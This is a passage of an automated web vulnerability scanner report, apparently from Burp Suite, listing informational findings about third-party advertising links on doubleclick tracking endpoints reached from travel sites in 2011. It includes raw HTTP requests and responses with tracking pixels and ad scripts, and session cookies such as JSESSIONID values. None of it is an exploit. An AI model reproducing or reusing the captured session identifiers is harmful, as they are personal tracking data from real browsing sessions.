GET /activityi;src=2588797;type=nausc826;cat=nauss008;ord=2134735815;u=ccf4a420af8b480f8413efb42e880287;u1=Hotel;u2=178239;u4=20111004%7C20111007;u6=1;u7=1%7C0;u9=;u11=0;u12=;u13=4215%7C15861%7C23415%7C1680030%7C2800816;u14=429.0%7C339.15%7C289.0%7C432.33%7C308.54;u16=USD HTTP/1.1
Host: fls.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.expedia.com/Hotel-Search?olacid=US.BD.IGOUGO-US.HOTEL.HOTEL&
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT

Response

HTTP/1.1 200 OK
X-Frame-Options: ALLOWALL
Server: Floodlight
Date: Mon, 03 Oct 2011 00:10:36 GMT
Expires: Mon, 03 Oct 2011 00:10:36 GMT
Cache-Control: private, max-age=0
X-Content-Type-Options: nosniff
Content-Type: text/html
Content-Length: 752
X-XSS-Protection: 1; mode=block

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html><head><title></title></head><body style="background-color: transparent"><IFRAME width="1" height="1" frameborder="0" marginwidth="0" marginheight="0" scrolling="no"
src="http://tags.bluekai.com/site/2625?ret=html&phint=u1=Hotel&phint=u2=178239&phint=u3=&phint=u4=20111004%7C20111007&phint=u5=&phint=u6=1&phint=u7=1%7C0&phint=u8=&phint=u9=&phint=u10=&phint=u11=0&phint=u12=&phint=u13=4215%7C15861%7C23415%7C1680030%7C2800816&phint=u14=429.0%7C339.15%7C289.0%7C432.33%7C308.54&phint=u16=USD&phint=u20="></IFRAME><script type="text/javascript"
src="http://a.cdn.intentmedia.net/javascripts/intent_media_expedia_beacon.js">
</script>
...[SNIP]...
19.133. http://fls.doubleclick.net/activityi  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://fls.doubleclick.net
Path:   /activityi

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /activityi;src=2588783;type=nausc547;cat=nauss482;ord=2134735815;u=ccf4a420af8b480f8413efb42e880287;u1=Hotel;u2=178239;u4=20111004%7C20111007;u6=1;u7=1%7C0;u9=;u11=0;u12=;u13=4215%7C15861%7C23415%7C1680030%7C2800816;u14=429.0%7C339.15%7C289.0%7C432.33%7C308.54;u16=USD HTTP/1.1
Host: fls.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.expedia.com/Hotel-Search?olacid=US.BD.IGOUGO-US.HOTEL.HOTEL&
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT

Response

HTTP/1.1 200 OK
X-Frame-Options: ALLOWALL
Server: Floodlight
Date: Mon, 03 Oct 2011 00:10:36 GMT
Expires: Mon, 03 Oct 2011 00:10:36 GMT
Cache-Control: private, max-age=0
X-Content-Type-Options: nosniff
Content-Type: text/html
Content-Length: 2825
X-XSS-Protection: 1; mode=block

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html><head><title></title></head><body style="background-color: transparent">
<iframe width="1" height="1" frameborder="0" scrolling="no" src="http://pm.dp.yieldmanager.net/PixelMonkey?adId=expedia&format=html&useReferrer=1&force_segment=Searchresults_US"></iframe>
...[SNIP]...
19.134. http://fls.doubleclick.net/activityi  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://fls.doubleclick.net
Path:   /activityi

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /activityi;src=2588797;type=nausc826;cat=nausi956;u=CCF4A420AF8B480F8413EFB42E880287;u1=Hotel;u4=20111014%7C20111016;u2=178239;u6=1;u7=2%7C0;u9=Hotel%20Commonwealth;u11=40;u13=894999;u14=209;u16=USD;ord=6847542107570.916? HTTP/1.1
Host: fls.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.expedia.com/Boston-Hotels-Hotel-Commonwealth.h894999.Hotel-Information?icmcid=TRIPA.Expedia_US-H_B4.11893.T&icmdtl=MT1110027Z3xeMPeET6itK0Qu1f-JQAAU.894999.HDSSDeE.T.QCI.258705.ch.668.60745.en_US..&chkin=10/14/11&hashTag=roomsAndRates&chkout=10/16/11&eapid=21187-1&rm1=a2&
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT

Response

HTTP/1.1 200 OK
X-Frame-Options: ALLOWALL
Server: Floodlight
Date: Mon, 03 Oct 2011 01:02:12 GMT
Expires: Mon, 03 Oct 2011 01:02:12 GMT
Cache-Control: private, max-age=0
X-Content-Type-Options: nosniff
Content-Type: text/html
Content-Length: 635
X-XSS-Protection: 1; mode=block

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html><head><title></title></head><body style="background-color: transparent"><IFRAME width="1" height="1" frameborder="0" marginwidth="0" marginheight="0" scrolling="no" src="http://tags.bluekai.com/site/2565?ret=html&phint=u1=Hotel&phint=u2=178239&phint=u4=20111014%7C20111016&phint=u6=1&phint=u7=2%7C0&phint=u9=Hotel%20Commonwealth&phint=u11=40&phint=u13=894999&phint=u14=209&phint=u15="></IFRAME><script type="text/javascript"
src="http://a.cdn.intentmedia.net/javascripts/intent_media_expedia_beacon.js">
</script>
...[SNIP]...
19.135. http://fls.doubleclick.net/activityi  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://fls.doubleclick.net
Path:   /activityi

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /activityi;src=1653087;type=hotel756;cat=hotel329;u2=BOS;u3=unknown;u4=unknown;u5=0;u6=0;u7=55.26;u13=1;u15=US;u16=34A63N3;ord=1;num=418599216785? HTTP/1.1
Host: fls.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://travel.travelocity.com/hotel/HotelAvailability.do;jsessionid=74C1C04EA1B1607D7CD2E1313B9B2779.p0617?Service=TRAVELOCITY&SEQ=1317600526540922011&pathIndicator=HOTEL_FRONTDOOR&leavingDate=mm/dd/yyyy&returningDate=mm/dd/yyyy&city=bos&cityCountryCode=US&dateFormat=mm/dd/yyyy&searchMode=city&
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT

Response

HTTP/1.1 200 OK
X-Frame-Options: ALLOWALL
Server: Floodlight
Date: Mon, 03 Oct 2011 00:09:00 GMT
Expires: Mon, 03 Oct 2011 00:09:00 GMT
Cache-Control: private, max-age=0
X-Content-Type-Options: nosniff
Content-Type: text/html
Content-Length: 2360
X-XSS-Protection: 1; mode=block

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html><head><title></title></head><body style="background-color: transparent"><IMG src='http://ats.tumri.net/ats/ats?cmd=RT&AdvertiserID=3052&platform=T&ActionID=17&ActionName=RTALL&ut1=HOTEL;&ut2=&ut3=BOS&ut4=&ut5=US&cachebuster=1230846595' height='1' width='1' /><img src="http://leadback.advertising.com/adcedge/lb?site=695501&srvc=1&betr=trv_cs=7[504]&betq=9669=409042[504]" width = "1" height = "1" border = "0"><iframe id="ad_frame" frameborder="0" width="1" height="1" style="margin:0px;" marginwidth="0" marginheight="0" vspace="0" hspace="0" allowtransparency="true" scrolling="no" src="http://www.tumri.net/ads/ads?ad_cl=3052&ad_se=http://www.tumri.net&lo_id=108455&ad_ty=onebyone&height=1&width=1&f1=,BOS&f2=,unknown&f3=,0&f4=,HOTEL&f5=,0&u1=&u2=BOS&u3=unknown&u4=unknown&u5=0&u6=0&u7=55.26">
</iframe><img src="http://ad.yieldmanager.com/pixel?id=109007&t=2" width="1" height="1" /><img src="http://ad.yieldmanager.com/unpixel?id=99271&id=109003&id=99259&id=99270&id=109004&id=99267&id=99268&id=99269&id=99263&id=99265&id=99260&id=99258&id=99255&id=109001&id=109002&id=99266&id=109008&id=99257&id=109005&id=109006&id=109010&id=109009&id=99262&id=99261&id=99256&id=99264&id=567382&id=567385&id=567384&id=567393&id=111327&id=111326" width="1" height="1" /> <!-- HTTP Search Pixel - Call from DFA Floodlight on LOBs -->
...[SNIP]...
<!-- Please do not modify Smart Pixel -->
<iframe src="http://yahoo.ytsa.net/tase/int?adv=18&fmt=html&pid=search&sec=0&dclk=hotel756;cat=hotel329;u2=BOS;u3=unknown;u4=unknown;u5=0;u6=0;u7=55.26;u13=1;u15=US;u16=34A63N3;ord=1;num=418599216785 width="1" height="1" align="center" frameborder="0" marginwidth="0" marginheight="0" vspace="0" hspace="0" allowtransparency="true" scrolling="no"></iframe>
<!-- Please do not modify Smart Pixel --><img src="http://leadback.advertising.com/adcedge/lb?site=695501&srvc=1&betr=trv_cs=7[336]&betq=9669=409042[336]" width = "1" height = "1" border = "0"><img src="http://ad.yieldmanager.com/pixel?id=902859&t=2" width = "1" height = "1" border = "0"><img width="1" height="1" border="0" alt="" src="http://pm.dp.yieldmanager.net/PixelMonkey?adId=travelocityhotels&format=image&useReferrer=1"/><img src="http://ads.bluelithium.com/pixel?id=1409010&t=2" width="1" height="1" /></body>
...[SNIP]...
19.136. http://fls.doubleclick.net/activityi  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://fls.doubleclick.net
Path:   /activityi

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /activityi;src=1653087;type=hotel756;cat=hotel329;u2=BOS;u3=unknown;u4=unknown;u5=0;u6=0;u7=55.26;u13=1;u15=US;u16=34A63N3;ord=1;num=058307050719? HTTP/1.1
Host: fls.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://travel.travelocity.com/hotel/HotelAvailability.do;jsessionid=74C1C04EA1B1607D7CD2E1313B9B2779.p0617
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT

Response

HTTP/1.1 200 OK
X-Frame-Options: ALLOWALL
Server: Floodlight
Date: Mon, 03 Oct 2011 00:13:23 GMT
Expires: Mon, 03 Oct 2011 00:13:23 GMT
Cache-Control: private, max-age=0
X-Content-Type-Options: nosniff
Content-Type: text/html
Content-Length: 2359
X-XSS-Protection: 1; mode=block

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html><head><title></title></head><body style="background-color: transparent"><IMG src='http://ats.tumri.net/ats/ats?cmd=RT&AdvertiserID=3052&platform=T&ActionID=17&ActionName=RTALL&ut1=HOTEL;&ut2=&ut3=BOS&ut4=&ut5=US&cachebuster=458476618' height='1' width='1' /><img src="http://leadback.advertising.com/adcedge/lb?site=695501&srvc=1&betr=trv_cs=7[504]&betq=9669=409042[504]" width = "1" height = "1" border = "0"><iframe id="ad_frame" frameborder="0" width="1" height="1" style="margin:0px;" marginwidth="0" marginheight="0" vspace="0" hspace="0" allowtransparency="true" scrolling="no" src="http://www.tumri.net/ads/ads?ad_cl=3052&ad_se=http://www.tumri.net&lo_id=108455&ad_ty=onebyone&height=1&width=1&f1=,BOS&f2=,unknown&f3=,0&f4=,HOTEL&f5=,0&u1=&u2=BOS&u3=unknown&u4=unknown&u5=0&u6=0&u7=55.26">
</iframe><img src="http://ad.yieldmanager.com/pixel?id=109007&t=2" width="1" height="1" /><img src="http://ad.yieldmanager.com/unpixel?id=99271&id=109003&id=99259&id=99270&id=109004&id=99267&id=99268&id=99269&id=99263&id=99265&id=99260&id=99258&id=99255&id=109001&id=109002&id=99266&id=109008&id=99257&id=109005&id=109006&id=109010&id=109009&id=99262&id=99261&id=99256&id=99264&id=567382&id=567385&id=567384&id=567393&id=111327&id=111326" width="1" height="1" /> <!-- HTTP Search Pixel - Call from DFA Floodlight on LOBs -->
...[SNIP]...
<!-- Please do not modify Smart Pixel -->
<iframe src="http://yahoo.ytsa.net/tase/int?adv=18&fmt=html&pid=search&sec=0&dclk=hotel756;cat=hotel329;u2=BOS;u3=unknown;u4=unknown;u5=0;u6=0;u7=55.26;u13=1;u15=US;u16=34A63N3;ord=1;num=058307050719 width="1" height="1" align="center" frameborder="0" marginwidth="0" marginheight="0" vspace="0" hspace="0" allowtransparency="true" scrolling="no"></iframe>
<!-- Please do not modify Smart Pixel --><img src="http://leadback.advertising.com/adcedge/lb?site=695501&srvc=1&betr=trv_cs=7[336]&betq=9669=409042[336]" width = "1" height = "1" border = "0"><img src="http://ad.yieldmanager.com/pixel?id=902859&t=2" width = "1" height = "1" border = "0"><img width="1" height="1" border="0" alt="" src="http://pm.dp.yieldmanager.net/PixelMonkey?adId=travelocityhotels&format=image&useReferrer=1"/><img src="http://ads.bluelithium.com/pixel?id=1409010&t=2" width="1" height="1" /></body>
...[SNIP]...
19.137. https://go.americanexpress-travel.com/hotel/HotelCobrand.do  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://go.americanexpress-travel.com
Path:   /hotel/HotelCobrand.do

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /hotel/HotelCobrand.do;jsessionid=959CC77E68C7D0C1E45369CF857BC3F1.p0716?Service=AMEX&leavingDate=10/04/11&returningDate=10/07/11&searchMode=city&city=Boston,%20United%20States&cityCountryCode=&hotelName=&adults=1&?Service=AMEX&WA1=03010&WA2=%EF%BF%BDid&WA4=%EF%BF%BDid&cmpid=af-ctn-af000063&widgetid=ratefind-hot HTTP/1.1
Host: go.americanexpress-travel.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://drf-global.com/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf?lob=HOTEL&advertiserName=amex&grp=21&placeholderUrl=http%3A%2F%2Fwww.travelocity.com%2Fvstrack%3FWA1%3D03020%26WA3%3D742%26WA5%3DDRFContinue%26WA6%3Dair%26dst%3Durl_placeholder&url=http%3A%2F%2Fad.doubleclick.net%2Fclk%3B206380952%3B28845483%3Bq%3Fhttp%3A%2F%2Fgo.americanexpress-travel.com%2Fhotel%2FHotelCobrand.do%3FService%3DAMEX%26leavingDate%3D%24%7BdepartureDate%3Ad%3A%22mm%2Fdd%2Fyy%22%7D%26returningDate%3D%24%7BreturnDate%3Ad%3A%22mm%2Fdd%2Fyy%22%7D%26searchMode%3Dcity%26city%3D%24%7Bcity%7D%2C%2520%24%7Bcountryn%7D%26cityCountryCode%3D%26hotelName%3D%26adults%3D%24%7Badults%7D%26%3FService%3DAMEX%26WA1%3D03010%26WA2%3D%25eaid%26WA4%3D%25ecid%26cmpid%3Daf-ctn-af000063%26widgetid%3Dratefind-hot&pid=c3919e40-e5b8-49f8-b876-4fed1f31968f&sid=bfa7dd53-c988-458c-86df-52443affccb8&uid=20d9c1fc-61a4-45f0-9524-380e68994c01&widget=H_PopUnder&pti=default&src=none&ppi=4a15630f-e16d-42c4-95d2-0852b73fdd75&ctx=92aa9504-b6eb-4091-8b93-6582f63d9555&ccn=1&cgn=141&pos=2&aii=2943600b-8719-4374-99f1-66c3d37bf8d3&%24cc=US&%24rc=US&%24adults=1&%24destination=Boston%2C%20MA%20Massachusetts&%24glsId=440663&%24city=Boston&%24countryn=United%20States&%24countryc=US&%24staten=Massachusetts&%24statec=MA&%24lob=HOTEL&%24rooms=1&%24context=92aa9504-b6eb-4091-8b93-6582f63d9555&%24widget=H_PopUnder&%24l=9&%24departureDate=2011-10-04&%24returnDate=2011-10-07&%24aucnt=0&%24pid=c3919e40-e5b8-49f8-b876-4fed1f31968f&%24sid=bfa7dd53-c988-458c-86df-52443affccb8&adunit=d5332d31-d5c8-59f8-c876-4fee1f31712a&
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: tyrg1st=5CE502CBA48A0513; JSID=959CC77E68C7D0C1E45369CF857BC3F1.p0716; TUID=987675b9-11f8-46ee-8be4-90a9f5cad5fa; JSESSIONID=959CC77E68C7D0C1E45369CF857BC3F1.p0716; Service=AMEX

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:14:41 GMT
Server: Apache
Set-Cookie: JSESSIONID=F117AC921CCE045ED73E1F0312D428B7.p0716; Path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 7238

<!-- PAGE: TimeKeeper -->
<link rel="icon" href="https://axptravel.americanexpress.com/ctnwt/favicon.ico"/>
<link rel="shortcut icon" href="https://axptravel.americanexpress.com/ctnwt/favicon.ico"/>

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtd">
...[SNIP]...
<NOSCRIPT>
<IMG SRC="https://ad.doubleclick.net/activity;src=189445;type=2004c410;cat=hotel343;ord=1;num=1?" WIDTH=1 HEIGHT=1 BORDER=0>
</NOSCRIPT>
...[SNIP]...
<NOSCRIPT>
<IMG SRC="https://ad.doubleclick.net/activity;src=1051924;type=consu114;cat=cruis785;ord=1;num='" WIDTH=1 HEIGHT=1 BORDER=0>
</NOSCRIPT>
...[SNIP]...
<NOSCRIPT>
<IFRAME SRC="https://fls.doubleclick.net/activityi;src=1174169;type=2004c714;cat=hotel322;ord=1;num=1?" WIDTH=1 HEIGHT=1 FRAMEBORDER=0></IFRAME>
...[SNIP]...
</div>
<script type="text/javascript" src="https://axptravel.americanexpress.com/ctnwt/theme/shared/js/icrossing/ctniclive.js"></script>
...[SNIP]...
19.138. http://googleads.g.doubleclick.net/pagead/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /pagead/ads?client=ca-pub-0666653885873574&output=html&h=250&slotname=7372794801&w=300&ea=0&flash=10.3.183&url=http%3A%2F%2Fads.pubmatic.com%2Fhosteddefaulttags%2F26620%2F26621%2F21556%2F559%2Fadtag.html&dt=1317606797018&bpp=7&shv=r20110921&jsv=r20110914&correlator=1317606797027&frm=8&adk=4114293891&ga_vid=1069027809.1317606797&ga_sid=1317606797&ga_hid=1887245699&ga_fc=0&u_tz=-300&u_his=8&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=23&u_nmime=106&dff=times%20new%20roman&dfs=16&adx=0&ady=0&biw=-12245933&bih=-12245933&ifk=2019610879&loc=http%3A%2F%2Fads.pubmatic.com%2FHostedDefaultTags%2F26620%2F26621%2F21556%2F559%2Fadtag.html&prodhost=googleads.g.doubleclick.net&fu=0&ifi=1&dtd=12 HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Mon, 03 Oct 2011 01:53:13 GMT
Server: cafe
Cache-Control: private
Content-Length: 1263
X-XSS-Protection: 1; mode=block

<html><head></head><body leftMargin="0" topMargin="0" marginwidth="0" marginheight="0"><script>var viewReq = new Array();function vu(u) {var i=new Image();i.src=u.replace("&amp;","&");viewReq.push(i);
...[SNIP]...
< - DO NOT MODIFY -->
<SCRIPT SRC="http://ad.dedicatedmedia.com/ttj?id=562058&cb=592559840&pubclick=http://adclick.g.doubleclick.net/aclk?sa=l&ai=ByqSqiRWJTs3sEc2oqwGP1s3TDPWyn_oBtZyU8CPNl96RbgAQARgBIAA4AVCAx-HEBGDJ1vqGyKOgGYIBF2NhLXB1Yi0wNjY2NjUzODg1ODczNTc0oAGZgO_qA7IBEGFkcy5wdWJtYXRpYy5jb226AQozMDB4MjUwX2FzyAEJ2gFKaHR0cDovL2Fkcy5wdWJtYXRpYy5jb20vaG9zdGVkZGVmYXVsdHRhZ3MvMjY2MjAvMjY2MjEvMjE1NTYvNTU5L2FkdGFnLmh0bWyYAvoBwAIEyALvpLwLqAMB9QMAAABE&num=1&sig=AOD64_21y1nu5mWiQMOEeNytMeOPMZRuvg&client=ca-pub-0666653885873574&adurl=" TYPE="text/javascript"></SCRIPT>
...[SNIP]...
19.139. http://googleads.g.doubleclick.net/pagead/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /pagead/ads?client=ca-pub-0666653885873574&output=html&h=250&slotname=7372794801&w=300&ea=0&flash=10.3.183&url=http%3A%2F%2Fads.pubmatic.com%2Fhosteddefaulttags%2F26620%2F26621%2F21556%2F559%2Fadtag.html&dt=1317606797018&bpp=7&shv=r20110921&jsv=r20110914&correlator=1317606797027&frm=8&adk=4114293891&ga_vid=1069027809.1317606797&ga_sid=1317606797&ga_hid=1887245699&ga_fc=0&u_tz=-300&u_his=8&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=23&u_nmime=106&dff=times%20new%20roman&dfs=16&adx=0&ady=0&biw=-12245933&bih=-12245933&ifk=2019610879&loc=http%3A%2F%2Fads.pubmatic.com%2FHostedDefaultTags%2F26620%2F26621%2F21556%2F559%2Fadtag.html&prodhost=googleads.g.doubleclick.net&fu=0&ifi=1&dtd=12 HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-0666653885873574&output=html&h=250&slotname=7372794801&w=300&ea=0&flash=10.3.183&url=http%3A%2F%2Fads.pubmatic.com%2Fhosteddefaulttags%2F26620%2F26621%2F21556%2F559%2Fadtag.html&dt=1317606797018&bpp=7&shv=r20110921&jsv=r20110914&correlator=1317606797027&frm=8&adk=4114293891&ga_vid=1069027809.1317606797&ga_sid=1317606797&ga_hid=1887245699&ga_fc=0&u_tz=-300&u_his=8&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=23&u_nmime=106&dff=times%20new%20roman&dfs=16&adx=0&ady=0&biw=-12245933&bih=-12245933&ifk=2019610879&loc=http%3A%2F%2Fads.pubmatic.com%2FHostedDefaultTags%2F26620%2F26621%2F21556%2F559%2Fadtag.html&prodhost=googleads.g.doubleclick.net&fu=0&ifi=1&dtd=12
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Mon, 03 Oct 2011 01:53:23 GMT
Server: cafe
Cache-Control: private
Content-Length: 1264
X-XSS-Protection: 1; mode=block

<html><head></head><body leftMargin="0" topMargin="0" marginwidth="0" marginheight="0"><script>var viewReq = new Array();function vu(u) {var i=new Image();i.src=u.replace("&amp;","&");viewReq.push(i);
...[SNIP]...
< - DO NOT MODIFY -->
<SCRIPT SRC="http://ad.dedicatedmedia.com/ttj?id=562058&cb=1155309149&pubclick=http://adclick.g.doubleclick.net/aclk?sa=l&ai=BjBjYkxWJTt3uAYqE2gXXz8mJCPWyn_oBtZyU8CPNl96RbgAQARgBIAA4AVCAx-HEBGDJ1vqGyKOgGYIBF2NhLXB1Yi0wNjY2NjUzODg1ODczNTc0oAGZgO_qA7IBEGFkcy5wdWJtYXRpYy5jb226AQozMDB4MjUwX2FzyAEJ2gFKaHR0cDovL2Fkcy5wdWJtYXRpYy5jb20vaG9zdGVkZGVmYXVsdHRhZ3MvMjY2MjAvMjY2MjEvMjE1NTYvNTU5L2FkdGFnLmh0bWyYAvoBwAIEyALvpLwLqAMB9QMAAABE&num=1&sig=AOD64_0nT7x-GHaafkiuKILnL9QPfI4YQQ&client=ca-pub-0666653885873574&adurl=" TYPE="text/javascript"></SCRIPT>
...[SNIP]...
19.140. http://googleads.g.doubleclick.net/pagead/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /pagead/ads?client=ca-pub-8213526369189339&output=html&h=250&slotname=2997671440&w=300&lmt=1316754276&num_ads=6&channel=5284625514&flash=10.3.183&hints=flights&url=http%3A%2F%2Fwww.trip.com%2F%3Ftype%3Dair%26utm_source%3Dorbitz%26utm_medium%3Dcrpopunder%26utm_content%3Dair%26utm_campaign%3Dtriplooking%26cmpid%3D1&dt=1317602103974&shv=r20100101&jsv=r20100101&correlator=1317602103976&frm=0&adk=3467918738&ga_vid=2049523975.1317602099&ga_sid=1317602099&ga_hid=1291285493&ga_fc=1&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=23&u_nmime=106&biw=0&bih=0&fu=0&js=uds&eid=37464000 HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.trip.com/?type=air&utm_source=orbitz&utm_medium=crpopunder&utm_content=air&utm_campaign=triplooking&cmpid=1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Mon, 03 Oct 2011 00:35:11 GMT
Server: cafe
Cache-Control: private
Content-Length: 14035
X-XSS-Protection: 1; mode=block

<!doctype html><html><head><style>a{color:#0000ff}body,table,div,ul,li{margin:0;padding:0}</style><script>(function(){window.ss=function(d,e){window.status=d;var c=document.getElementById(e);if(c){var
...[SNIP]...
